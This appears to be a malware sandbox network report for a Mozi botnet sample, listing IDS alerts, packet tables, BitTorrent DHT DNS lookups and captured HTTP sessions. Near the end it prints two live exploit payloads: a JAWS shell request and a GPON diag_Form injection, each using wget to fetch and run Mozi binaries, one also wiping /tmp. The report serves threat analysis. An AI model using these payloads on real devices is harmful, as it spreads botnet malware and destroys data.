                                                                                                        01/06/21-14:59:28.701346UDP2030919ET TROJAN Mozi Botnet DHT Config Sent5744514165211.227.96.15192.168.2.20
                                                                                                        01/06/21-14:59:29.913151ICMP402ICMP Destination Unreachable Port Unreachable24.90.241.64192.168.2.20
                                                                                                        01/06/21-14:59:34.514870ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                        01/06/21-14:59:34.516841ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited134.97.128.247192.168.2.20
                                                                                                        01/06/21-14:59:34.625604ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.37.130.69192.168.2.20
                                                                                                        01/06/21-14:59:38.626832TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)4292280192.168.2.2023.96.36.243
                                                                                                        01/06/21-14:59:38.626832TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)4292280192.168.2.2023.96.36.243
                                                                                                        01/06/21-14:59:40.730858ICMP485ICMP Destination Unreachable Communication Administratively Prohibited94.218.155.42192.168.2.20
                                                                                                        01/06/21-14:59:44.518047ICMP399ICMP Destination Unreachable Host Unreachable109.224.192.76192.168.2.20
                                                                                                        01/06/21-14:59:44.518092ICMP399ICMP Destination Unreachable Host Unreachable109.224.192.76192.168.2.20
                                                                                                        01/06/21-14:59:45.513344ICMP485ICMP Destination Unreachable Communication Administratively Prohibited84.155.180.12192.168.2.20
                                                                                                        01/06/21-14:59:45.646914ICMP485ICMP Destination Unreachable Communication Administratively Prohibited4.16.0.234192.168.2.20
                                                                                                        01/06/21-14:59:45.674784ICMP401ICMP Destination Unreachable Network Unreachable193.203.0.195192.168.2.20
                                                                                                        01/06/21-14:59:45.686175ICMP402ICMP Destination Unreachable Port Unreachable189.130.236.65192.168.2.20
                                                                                                        01/06/21-14:59:45.749199ICMP449ICMP Time-To-Live Exceeded in Transit14.0.9.94192.168.2.20
                                                                                                        01/06/21-14:59:47.518142ICMP399ICMP Destination Unreachable Host Unreachable109.224.192.76192.168.2.20
                                                                                                        01/06/21-14:59:48.847505ICMP399ICMP Destination Unreachable Host Unreachable24.30.174.118192.168.2.20
                                                                                                        01/06/21-14:59:53.556488TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution4428680192.168.2.2034.117.168.156
                                                                                                        01/06/21-14:59:53.739447ICMP399ICMP Destination Unreachable Host Unreachable112.188.185.146192.168.2.20
                                                                                                        01/06/21-14:59:54.046507TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5160280192.168.2.20104.98.58.115
                                                                                                        01/06/21-14:59:54.046507TCP2025883ET EXPLOIT MVPower DVR Shell UCE5160280192.168.2.20104.98.58.115
                                                                                                        01/06/21-14:59:54.195096TCP1200ATTACK-RESPONSES Invalid URL8051602104.98.58.115192.168.2.20
                                                                                                        01/06/21-14:59:55.670149ICMP399ICMP Destination Unreachable Host Unreachable37.220.104.190192.168.2.20
                                                                                                        01/06/21-14:59:55.767354ICMP449ICMP Time-To-Live Exceeded in Transit41.210.241.47192.168.2.20
                                                                                                        01/06/21-14:59:59.587552ICMP449ICMP Time-To-Live Exceeded in Transit131.125.10.4192.168.2.20
                                                                                                        01/06/21-15:00:02.729524ICMP399ICMP Destination Unreachable Host Unreachable112.190.172.242192.168.2.20
                                                                                                        01/06/21-15:00:03.680547ICMP399ICMP Destination Unreachable Host Unreachable201.17.8.210192.168.2.20
                                                                                                        01/06/21-15:00:04.011617TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4739480192.168.2.2015.206.172.134
                                                                                                        01/06/21-15:00:04.011617TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4739480192.168.2.2015.206.172.134
                                                                                                        01/06/21-15:00:04.666236ICMP449ICMP Time-To-Live Exceeded in Transit98.152.214.82192.168.2.20
                                                                                                        01/06/21-15:00:06.964167ICMP402ICMP Destination Unreachable Port Unreachable78.78.189.39192.168.2.20
                                                                                                        01/06/21-15:00:07.070263ICMP449ICMP Time-To-Live Exceeded in Transit185.214.76.18192.168.2.20
                                                                                                        01/06/21-15:00:13.658998ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited107.164.203.92192.168.2.20
                                                                                                        01/06/21-15:00:15.163187ICMP399ICMP Destination Unreachable Host Unreachable79.104.247.43192.168.2.20
                                                                                                        01/06/21-15:00:17.600297ICMP399ICMP Destination Unreachable Host Unreachable72.26.212.10192.168.2.20
                                                                                                        01/06/21-15:00:17.600346ICMP399ICMP Destination Unreachable Host Unreachable72.26.212.10192.168.2.20

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                        Jan 6, 2021 14:57:25.826627970 CET5835881192.168.2.20214.101.231.205
                                                                                                        Jan 6, 2021 14:57:25.826646090 CET4116080192.168.2.20142.24.206.40
                                                                                                        Jan 6, 2021 14:57:25.826674938 CET504048080192.168.2.20195.47.32.35
                                                                                                        Jan 6, 2021 14:57:25.826716900 CET389208080192.168.2.20206.85.0.219
                                                                                                        Jan 6, 2021 14:57:25.826756954 CET514888080192.168.2.20193.139.114.52
                                                                                                        Jan 6, 2021 14:57:25.826773882 CET383828443192.168.2.2021.39.93.98
                                                                                                        Jan 6, 2021 14:57:25.826797962 CET5127852869192.168.2.2050.74.153.237
                                                                                                        Jan 6, 2021 14:57:25.826824903 CET454185555192.168.2.20219.2.155.95
                                                                                                        Jan 6, 2021 14:57:25.826857090 CET467127574192.168.2.2020.162.94.18
                                                                                                        Jan 6, 2021 14:57:25.826879025 CET433848080192.168.2.20188.213.189.127
                                                                                                        Jan 6, 2021 14:57:25.826905966 CET3920852869192.168.2.20189.5.233.211
                                                                                                        Jan 6, 2021 14:57:25.826926947 CET3892837215192.168.2.2014.134.169.239
                                                                                                        Jan 6, 2021 14:57:25.826982975 CET5508480192.168.2.20100.179.158.248

UDP Packets

Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                        Jan 6, 2021 14:59:29.401551962 CET1416557898192.168.2.205.189.183.129
                                                                                                        Jan 6, 2021 14:59:29.452788115 CET57898141655.189.183.129192.168.2.20
                                                                                                        Jan 6, 2021 14:59:29.453346968 CET1416523516192.168.2.2046.107.59.14
                                                                                                        Jan 6, 2021 14:59:29.525434971 CET235161416546.107.59.14192.168.2.20
                                                                                                        Jan 6, 2021 14:59:29.526041985 CET1416526302192.168.2.2078.131.127.204
                                                                                                        Jan 6, 2021 14:59:29.622905970 CET263021416578.131.127.204192.168.2.20
                                                                                                        Jan 6, 2021 14:59:29.623461962 CET1416554201192.168.2.205.160.131.227
                                                                                                        Jan 6, 2021 14:59:29.782563925 CET54201141655.160.131.227192.168.2.20
                                                                                                        Jan 6, 2021 14:59:29.783198118 CET1416550004192.168.2.2024.90.241.64
                                                                                                        Jan 6, 2021 14:59:32.440474987 CET1416523260192.168.2.2081.249.182.231
                                                                                                        Jan 6, 2021 14:59:39.070451021 CET1416562035192.168.2.20188.156.134.49
                                                                                                        Jan 6, 2021 14:59:48.769526005 CET1416564613192.168.2.20176.63.31.193
                                                                                                        Jan 6, 2021 14:59:48.848757029 CET6461314165176.63.31.193192.168.2.20
                                                                                                        Jan 6, 2021 14:59:48.850219011 CET1416551413192.168.2.2094.21.221.121
                                                                                                        Jan 6, 2021 15:00:09.841169119 CET1416550844192.168.2.2092.249.162.242
                                                                                                        Jan 6, 2021 15:00:32.255239010 CET1416532993192.168.2.2062.77.144.95
                                                                                                        Jan 6, 2021 15:00:32.325289965 CET329931416562.77.144.95192.168.2.20
                                                                                                        Jan 6, 2021 15:00:32.325937986 CET1416551413192.168.2.2084.236.123.237
                                                                                                        Jan 6, 2021 15:00:32.416136980 CET514131416584.236.123.237192.168.2.20
                                                                                                        Jan 6, 2021 15:00:32.417401075 CET1416557468192.168.2.20106.222.107.1
                                                                                                        Jan 6, 2021 15:01:01.515089035 CET1416565510192.168.2.20193.226.227.130
                                                                                                        Jan 6, 2021 15:01:01.604049921 CET6551014165193.226.227.130192.168.2.20
                                                                                                        Jan 6, 2021 15:01:01.604559898 CET1416532149192.168.2.2080.98.22.37
                                                                                                        Jan 6, 2021 15:01:01.676628113 CET321491416580.98.22.37192.168.2.20
                                                                                                        Jan 6, 2021 15:01:01.677140951 CET1416554545192.168.2.20212.51.146.221
                                                                                                        Jan 6, 2021 15:01:01.724940062 CET5454514165212.51.146.221192.168.2.20
                                                                                                        Jan 6, 2021 15:01:01.725334883 CET1416551417192.168.2.20185.29.82.74
                                                                                                        Jan 6, 2021 15:01:01.810570955 CET5141714165185.29.82.74192.168.2.20
                                                                                                        Jan 6, 2021 15:01:01.810982943 CET141651329192.168.2.2087.229.77.177
                                                                                                        Jan 6, 2021 15:01:01.863886118 CET13291416587.229.77.177192.168.2.20
                                                                                                        Jan 6, 2021 15:01:01.864317894 CET1416539156192.168.2.2089.134.24.66
                                                                                                        Jan 6, 2021 15:01:01.947441101 CET391561416589.134.24.66192.168.2.20
                                                                                                        Jan 6, 2021 15:01:01.948854923 CET1416553835192.168.2.20178.164.217.57
                                                                                                        Jan 6, 2021 15:01:02.044925928 CET5383514165178.164.217.57192.168.2.20
                                                                                                        Jan 6, 2021 15:01:02.045474052 CET141652257192.168.2.2094.125.243.246
                                                                                                        Jan 6, 2021 15:01:08.809009075 CET1416564796192.168.2.2031.171.235.251
                                                                                                        Jan 6, 2021 15:01:08.875351906 CET647961416531.171.235.251192.168.2.20
                                                                                                        Jan 6, 2021 15:01:08.875880003 CET141656881192.168.2.20192.99.1.210
                                                                                                        Jan 6, 2021 15:01:09.009665012 CET688114165192.99.1.210192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.010077953 CET1416559222192.168.2.2098.251.39.207
                                                                                                        Jan 6, 2021 15:01:09.161405087 CET592221416598.251.39.207192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.161948919 CET1416551413192.168.2.2084.0.205.118
                                                                                                        Jan 6, 2021 15:01:09.224409103 CET514131416584.0.205.118192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.225684881 CET1416560076192.168.2.2080.99.30.246
                                                                                                        Jan 6, 2021 15:01:09.304646969 CET600761416580.99.30.246192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.305191994 CET1416527377192.168.2.2078.92.59.208
                                                                                                        Jan 6, 2021 15:01:09.366184950 CET273771416578.92.59.208192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.366735935 CET1416542313192.168.2.20178.48.169.142
                                                                                                        Jan 6, 2021 15:01:09.433509111 CET4231314165178.48.169.142192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.434088945 CET1416512143192.168.2.2088.123.129.99
                                                                                                        Jan 6, 2021 15:01:09.503544092 CET121431416588.123.129.99192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.504018068 CET1416552536192.168.2.20178.141.209.16
                                                                                                        Jan 6, 2021 15:01:12.824455023 CET5818953192.168.2.208.8.8.8
                                                                                                        Jan 6, 2021 15:01:12.824645996 CET3344653192.168.2.208.8.8.8
                                                                                                        Jan 6, 2021 15:01:12.872807980 CET53334468.8.8.8192.168.2.20
                                                                                                        Jan 6, 2021 15:01:12.875313997 CET53581898.8.8.8192.168.2.20
                                                                                                        Jan 6, 2021 15:01:31.190726995 CET1416530301192.168.2.20103.216.155.225

ICMP Packets

Timestamp    Source IP    Dest IP    Checksum    Code    Type
                                                                                                        Jan 6, 2021 14:59:29.913151026 CET24.90.241.64192.168.2.20c9d4(Port unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:34.514869928 CET149.11.89.129192.168.2.20f068(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:34.516840935 CET134.97.128.247192.168.2.203d80(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:34.625603914 CET87.37.130.69192.168.2.205945(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:40.730858088 CET94.218.155.42192.168.2.2026b0(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:44.518047094 CET109.224.192.76192.168.2.209c7(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:44.518091917 CET109.224.192.76192.168.2.209c7(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:45.513344049 CET84.155.180.12192.168.2.2049e9(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:45.646914005 CET4.16.0.234192.168.2.20f5ee(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:45.674783945 CET193.203.0.195192.168.2.2080f7(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:45.686175108 CET189.130.236.65192.168.2.2069ac(Port unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:45.749198914 CET14.0.9.94192.168.2.209339(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:59:47.518141985 CET109.224.192.76192.168.2.209c7(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:48.847505093 CET24.30.174.118192.168.2.201a40(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:53.739447117 CET112.188.185.146192.168.2.20cc8(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:55.670149088 CET37.220.104.190192.168.2.20f5ad(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:55.767354012 CET41.210.241.47192.168.2.20a8de(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:59:59.587552071 CET131.125.10.4192.168.2.20dc5b(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:02.729523897 CET112.190.172.242192.168.2.20710a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:03.680546999 CET201.17.8.210192.168.2.20cf13(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:04.666235924 CET98.152.214.82192.168.2.201844(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:06.964167118 CET78.78.189.39192.168.2.20cb5d(Port unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:07.070262909 CET185.214.76.18192.168.2.20d070(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:13.658998013 CET107.164.203.92192.168.2.20f6e1(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:15.163187027 CET79.104.247.43192.168.2.202bb0(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:17.600296974 CET72.26.212.10192.168.2.208912(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:17.600346088 CET72.26.212.10192.168.2.208912(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:22.038872957 CET212.55.211.226192.168.2.206d9e(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:22.044158936 CET213.61.250.219192.168.2.2088b3(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:23.675431013 CET187.225.228.249192.168.2.2060c3(Port unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:27.618696928 CET205.145.208.5192.168.2.205998(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:30.738457918 CET182.163.63.250192.168.2.20b55e(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:30.738495111 CET182.163.63.250192.168.2.20b55e(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:33.743341923 CET182.163.63.250192.168.2.20b55e(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:34.533756018 CET92.192.4.224192.168.2.207dd2(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:34.755757093 CET221.134.65.145192.168.2.206870(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:34.799127102 CET181.224.188.111192.168.2.20323a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:34.799175978 CET181.224.188.111192.168.2.20323a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:34.799204111 CET181.224.188.111192.168.2.20323a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:35.946397066 CET149.11.89.129192.168.2.2073e8(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:37.687701941 CET10.161.35.62192.168.2.20846(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:37.687741041 CET10.161.35.62192.168.2.20846(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:40.478363037 CET149.11.89.129192.168.2.20233f(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:40.687676907 CET10.161.35.62192.168.2.20846(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:41.002551079 CET182.48.81.78192.168.2.20639a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:41.002592087 CET182.48.81.78192.168.2.20639a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:41.489645958 CET149.11.89.129192.168.2.20731d(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:41.790199041 CET210.171.224.224192.168.2.20c49b(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:44.002404928 CET182.48.81.78192.168.2.20639a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:44.505012035 CET149.11.89.129192.168.2.2051ab(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:44.528371096 CET92.210.243.211192.168.2.20f1a4(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:44.685467958 CET10.252.252.1192.168.2.20b0f4(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:44.711818933 CET10.5.4.1192.168.2.207a3c(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:44.711848021 CET10.5.4.1192.168.2.207a3c(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:44.739614010 CET121.173.147.138192.168.2.2037a8(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:44.739654064 CET121.173.147.138192.168.2.2037a8(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:45.510428905 CET149.11.89.129192.168.2.204d05(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:46.628890038 CET206.172.194.249192.168.2.20fb37(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:47.513242006 CET136.163.209.40192.168.2.20b51a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:47.522638083 CET149.11.89.129192.168.2.2070cf(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:47.740329981 CET121.173.147.138192.168.2.2037a8(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:47.879973888 CET10.5.4.1192.168.2.207a3c(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:48.801064968 CET61.109.133.114192.168.2.20da42(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:51.547976017 CET89.228.14.10192.168.2.201ef8(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:55.503956079 CET217.196.225.4192.168.2.20b937(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:55.656976938 CET64.59.150.30192.168.2.209d0d(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:58.623317957 CET24.215.105.193192.168.2.204276(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:59.538392067 CET217.92.141.24192.168.2.20d8dc(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:01.653841019 CET196.22.163.190192.168.2.203542(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:01.653906107 CET196.22.163.190192.168.2.203542(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:02.638355970 CET65.206.180.73192.168.2.20ff23(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:01:02.711278915 CET187.18.116.82192.168.2.20ef45(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:04.648133039 CET196.22.163.190192.168.2.203542(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:04.727164030 CET174.61.0.221192.168.2.20c531(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:04.727220058 CET174.61.0.221192.168.2.20c531(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:04.727247000 CET174.61.0.221192.168.2.20c531(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:07.140486002 CET196.218.192.105192.168.2.20e5d2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:07.140548944 CET196.218.192.105192.168.2.20e5d2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:07.141227007 CET196.218.192.105192.168.2.20e5d2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:08.469717026 CET10.45.129.110192.168.2.2052f2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:08.469760895 CET10.45.129.110192.168.2.2052f2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:09.641868114 CET216.221.97.226192.168.2.20a5da(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:09.663777113 CET203.116.7.190192.168.2.208f8e(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:09.792810917 CET109.197.243.33192.168.2.20dbe1(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:01:10.557548046 CET10.100.100.2192.168.2.20faf2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:11.459120035 CET187.120.48.29192.168.2.20ae66(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:11.459158897 CET187.120.48.29192.168.2.20ae66(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:11.759555101 CET10.45.129.110192.168.2.2052f2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:12.536314011 CET90.80.66.54192.168.2.20a426(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:13.538855076 CET100.64.0.35192.168.2.20f962(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:01:14.698060036 CET187.120.48.29192.168.2.20ae66(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:15.298377991 CET140.114.3.30192.168.2.2033fb(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:15.654951096 CET10.99.11.2192.168.2.2081da(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:15.654994965 CET10.99.11.2192.168.2.2081da(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:16.513741970 CET87.148.141.21192.168.2.20c00f(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:18.655107021 CET10.99.11.2192.168.2.2081da(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:19.630877972 CET10.22.134.50192.168.2.20a0d1(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:01:23.515122890 CET94.225.9.137192.168.2.202854(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:23.519484043 CET94.225.9.137192.168.2.202854(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:23.678210020 CET41.79.148.162192.168.2.20566c(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:01:23.715193033 CET152.255.134.213192.168.2.2017f9(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:01:26.514965057 CET94.225.9.137192.168.2.202854(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:26.527113914 CET178.114.115.193192.168.2.201148(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:26.528310061 CET178.114.115.193192.168.2.201148(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:29.529879093 CET178.114.115.193192.168.2.201148(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:30.636097908 CET66.97.63.178192.168.2.2050b(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:30.778656960 CET222.227.19.236192.168.2.209f6b(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:32.010106087 CET122.210.220.65192.168.2.201727(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:33.529989958 CET193.203.0.195192.168.2.208da7(Net unreachable)Destination Unreachable

                                                                                                        DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Jan 6, 2021 14:57:45.387015104 CET | 192.168.2.20 | 8.8.8.8 | 0x2 | Standard query (0) | dht.transmissionbt.com | A (IP address) | IN (0x0001) |
| Jan 6, 2021 14:57:45.439794064 CET | 192.168.2.20 | 8.8.8.8 | 0x3 | Standard query (0) | router.bittorrent.com | A (IP address) | IN (0x0001) |
| Jan 6, 2021 14:57:45.489500046 CET | 192.168.2.20 | 8.8.8.8 | 0x4 | Standard query (0) | router.utorrent.com | A (IP address) | IN (0x0001) |
| Jan 6, 2021 14:57:45.542176008 CET | 192.168.2.20 | 8.8.8.8 | 0x5 | Standard query (0) | bttracker.debian.org | A (IP address) | IN (0x0001) |

                                                                                                        DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Jan 6, 2021 14:57:45.435297966 CET | 8.8.8.8 | 192.168.2.20 | 0x2 | No error (0) | dht.transmissionbt.com | | 87.98.162.88 | A (IP address) | IN (0x0001) |
| Jan 6, 2021 14:57:45.435297966 CET | 8.8.8.8 | 192.168.2.20 | 0x2 | No error (0) | dht.transmissionbt.com | | 212.129.33.59 | A (IP address) | IN (0x0001) |
| Jan 6, 2021 14:57:45.487713099 CET | 8.8.8.8 | 192.168.2.20 | 0x3 | No error (0) | router.bittorrent.com | | 67.215.246.10 | A (IP address) | IN (0x0001) |
| Jan 6, 2021 14:57:45.540313959 CET | 8.8.8.8 | 192.168.2.20 | 0x4 | No error (0) | router.utorrent.com | | 82.221.103.244 | A (IP address) | IN (0x0001) |
| Jan 6, 2021 14:57:45.593162060 CET | 8.8.8.8 | 192.168.2.20 | 0x5 | No error (0) | bttracker.debian.org | bttracker.acc.umu.se | | CNAME (Canonical name) | IN (0x0001) |
| Jan 6, 2021 14:57:45.593162060 CET | 8.8.8.8 | 192.168.2.20 | 0x5 | No error (0) | bttracker.acc.umu.se | | 130.239.18.159 | A (IP address) | IN (0x0001) |

                                                                                                        HTTP Request Dependency Graph


                                                                                                        HTTP Packets

| Session ID | Source IP | Source Port | Destination IP | Destination Port |
|---|---|---|---|---|
| 0 | 192.168.2.20 | 47982 | 23.44.146.105 | 80 |

Timestamp: Jan 6, 2021 14:57:26.185761929 CET; kBytes transferred: 10; Direction: OUT; Data:
GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
User-Agent: Hello, world
Host: 23.44.146.105:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive

Timestamp: Jan 6, 2021 14:57:26.486361027 CET; kBytes transferred: 11; Direction: IN; Data:
HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 207
Expires: Wed, 06 Jan 2021 13:57:26 GMT
Date: Wed, 06 Jan 2021 13:57:26 GMT
Connection: close
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ed04c045&#46;1609941446&#46;b66f4b</BODY></HTML>


                                                                                                       Session ID  Source IP     Source Port  Destination IP   Destination Port
                                                                                                       1           192.168.2.20  51592        35.168.169.85    80
                                                                                                       Timestamp                           kBytes transferred  Direction  Data
                                                                                                       Jan 6, 2021 14:57:39.652837992 CET  123                 OUT        POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                       Jan 6, 2021 14:57:39.781816959 CET  125                 IN         HTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Jan 2021 13:57:39 GMT
                                                                                                        Server: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fips
                                                                                                        Content-Length: 216
                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: text/html; charset=iso-8859-1
